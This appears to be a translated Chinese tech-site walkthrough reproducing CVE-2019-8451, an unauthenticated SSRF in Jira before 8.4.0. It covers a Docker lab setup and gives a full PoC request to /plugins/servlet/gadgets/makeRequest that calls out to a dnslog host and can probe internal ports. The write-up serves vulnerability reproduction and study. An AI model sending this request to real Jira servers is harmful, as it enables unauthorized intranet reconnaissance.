Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you an example analysis of the recurrence of CVE-2019-8451 vulnerabilities generated by Jira unauthorized SSRF. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Introduction to 0x00

JIRA is a project and transaction tracking tool produced by Atlassian, which is widely used in defect tracking, customer service, requirements collection, process approval, task tracking, project tracking and agile management.

Overview of 0x01 vulnerabilities

There is a SSRF vulnerability in the / plugins/servlet/gadgets/makeRequest resource of Jira due to a logic flaw in the class JiraWhitelist. A remote attacker who successfully exploits this vulnerability can access intranet resources as a Jira server. After analysis, this vulnerability can be triggered without any credentials. (from Qianxin CERT)

0x02 scope of influence

Jira

< 8.4.0 0x03 环境搭建 在线靶场 开放时间（当前-9月29日20:00） 获取方式（完成任意一个）： 1、将本文转发至朋友圈并配文字，截图发至公众号内 2、联系作者，五元红包 自行搭建 使用docker进行搭建，执行以下命令开启环境 docker pull cptactionhank/atlassian-jira:7.8.0docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 访问ip:8080进行安装 下图选择第二个 继续即可

Click next, and two pictures are missing.

To generate a JIRA license

After generation, find License Key, go back to the page and fill in License Key to continue the installation.

At this point, the installation is complete.

0x04 vulnerability exploitation

Visit ip:8080 first, and then refresh the grab package

Replace the packet with the following Poc:

GET / plugins/servlet/gadgets/makeRequest?url= http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK Gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

The ip is replaced by the target ip in three places.

Change the address of your dnslog after @

Repeater sends the package

Go to dnslog to refresh and check the results, and you can see traffic passing by.

If the access port is not open, the result is as follows:

The above is an example of the recurrence of CVE-2019-8451 vulnerabilities generated by Jira unauthorized SSRF shared by Xiaobian. If you happen to have similar doubts, please refer to the above analysis for understanding. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.